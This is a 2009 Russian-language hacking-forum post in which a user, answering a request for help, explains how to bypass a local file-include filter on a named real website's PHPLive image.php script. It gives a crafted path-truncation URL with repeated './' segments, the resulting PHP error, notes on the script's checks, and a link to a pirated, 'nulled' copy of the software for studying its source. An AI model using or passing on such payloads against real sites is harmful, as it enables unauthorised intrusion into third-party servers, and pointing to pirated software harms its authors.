15.06.2009, 01:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Велемир
В статье какой-то было.
Вот эта статья https://forum.antichat.ru/thread91807.html
Сообщение от Велемир
Народ,кто-нибудь может показать пример обхода инклуда на этом сайте?
http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0
l
Сделай так
http://www.alertsite.com/phplive/image.php?l=image.php/./.[...]/././.
Будет
Warning: is_dir(): Stat failed for ./web/image.php......................................... .................................................. .................................................. .................................................. .................................................. ............................. (errno=36 - File name too long)
Это phplive, там фильтрация+file_exists+is_dir. Вот этот двиг нулленный - http://rapidshare.com/files/86879595/Phplive.3.2.2.NULLED-FiXED-LOGOUT.rar
смотри сурс image.php, там правда закоментили кусок кода (видимо химичили пока делали нулл), но сайте все работает
|
|
|